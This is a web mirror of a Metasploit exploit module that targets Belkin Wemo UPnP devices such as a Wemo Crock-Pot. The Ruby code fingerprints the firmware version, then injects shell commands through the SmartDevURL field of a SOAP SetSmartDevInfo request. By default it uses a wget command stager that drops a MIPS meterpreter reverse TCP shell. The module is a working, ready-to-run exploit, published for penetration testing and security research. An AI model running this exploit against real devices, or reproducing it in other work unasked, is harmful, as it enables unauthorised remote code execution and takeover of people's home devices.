Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
19850 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
8
Rank = ExcellentRanking
9
10
include Msf::Exploit::Remote::HttpClient
11
include Msf::Exploit::CmdStager
12
prepend Msf::Exploit::Remote::AutoCheck
13
14
def initialize(info = {})
15
super(
16
update_info(
17
info,
18
'Name' => 'Belkin Wemo UPnP Remote Code Execution',
19
'Description' => %q{
20
This module exploits a command injection in the Belkin Wemo UPnP API via
21
the SmartDevURL argument to the SetSmartDevInfo action.
22
23
This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
24
devices are known to be affected, albeit on a different RPORT (49153).
25
},
26
'Author' => [
27
'phikshun', # Discovery, UFuzz, and modules
28
'wvu', # Crock-Pot testing and module
29
'nstarke' # Version-checking research and implementation
30
],
31
'References' => [
32
['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
33
['URL', 'https://github.com/phikshun/ufuzz'],
34
['URL', 'https://gist.github.com/phikshun/10900566'],
35
['URL', 'https://gist.github.com/phikshun/9984624'],
36
['URL', 'http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html'],
37
['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
38
['URL', 'http://www.wemo.com/']
39
],
40
'DisclosureDate' => '2014-04-04',
41
'License' => MSF_LICENSE,
42
'Platform' => ['unix', 'linux'],
43
'Arch' => [ARCH_CMD, ARCH_MIPSLE],
44
'Privileged' => true,
45
'Targets' => [
46
[
47
'Unix In-Memory',
48
{
49
'Platform' => 'unix',
50
'Arch' => ARCH_CMD,
51
'Type' => :unix_memory,
52
'DefaultOptions' => {
53
'PAYLOAD' => 'cmd/unix/generic'
54
}
55
}
56
],
57
[
58
'Linux Dropper',
59
{
60
'Platform' => 'linux',
61
'Arch' => ARCH_MIPSLE,
62
'Type' => :linux_dropper,
63
'DefaultOptions' => {
64
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
65
}
66
}
67
]
68
],
69
'DefaultTarget' => 1,
70
'Notes' => {
71
'NOCVE' => ['Patched in 2.00.8643 without vendor disclosure'],
72
'Stability' => [CRASH_SAFE],
73
'SideEffects' => [ARTIFACTS_ON_DISK],
74
'Reliability' => [REPEATABLE_SESSION]
75
}
76
)
77
)
78
79
register_options([
80
Opt::RPORT(49152)
81
])
82
83
register_advanced_options([
84
OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
85
])
86
end
87
88
def check
89
checkcode = CheckCode::Unknown
90
91
res = send_request_cgi(
92
'method' => 'GET',
93
'uri' => '/setup.xml'
94
)
95
96
unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
97
vprint_error('Wemo-enabled device not detected')
98
return checkcode
99
end
100
101
vprint_good('Wemo-enabled device detected')
102
checkcode = CheckCode::Detected
103
104
version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
105
v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && ::Regexp.last_match(1) && Rex::Version.new(::Regexp.last_match(1))
106
107
unless version
108
vprint_error('Could not determine firmware version')
109
return checkcode
110
end
111
112
vprint_status("Found firmware version: #{version}")
113
114
# https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
115
if version < Rex::Version.new('2.00.8643')
116
vprint_good("Firmware version #{version} < 2.00.8643")
117
checkcode = CheckCode::Appears
118
else
119
vprint_error("Firmware version #{version} >= 2.00.8643")
120
checkcode = CheckCode::Safe
121
end
122
123
checkcode
124
end
125
126
def exploit
127
case target['Type']
128
when :unix_memory
129
execute_command(payload.encoded)
130
when :linux_dropper
131
cmdstager = generate_cmdstager(
132
flavor: :wget,
133
temp: datastore['WritableDir'],
134
file: File.basename(cmdstager_path),
135
noconcat: true
136
)
137
138
# HACK: "chmod +x"
139
cmdstager.unshift("cp /bin/sh #{cmdstager_path}")
140
cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }
141
cmdstager = cmdstager.join(';')
142
143
vprint_status("Regenerated command stager: #{cmdstager}")
144
execute_command(cmdstager)
145
end
146
end
147
148
def execute_command(cmd, _opts = {})
149
send_request_cgi(
150
'method' => 'POST',
151
'uri' => '/upnp/control/basicevent1',
152
'ctype' => 'text/xml',
153
'headers' => {
154
'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
155
},
156
'data' => generate_soap_xml(cmd)
157
)
158
end
159
160
def generate_soap_xml(cmd)
161
<<~EOF
162
<?xml version="1.0" encoding="utf-8"?>
163
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
164
<s:Body>
165
<u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
166
<SmartDevURL>$(#{cmd.encode(xml: :text)})</SmartDevURL>
167
</u:SetSmartDevInfo>
168
</s:Body>
169
</s:Envelope>
170
EOF
171
end
172
173
def cmdstager_path
174
@cmdstager_path ||=
175
"#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
176
end
177
178
end
179
180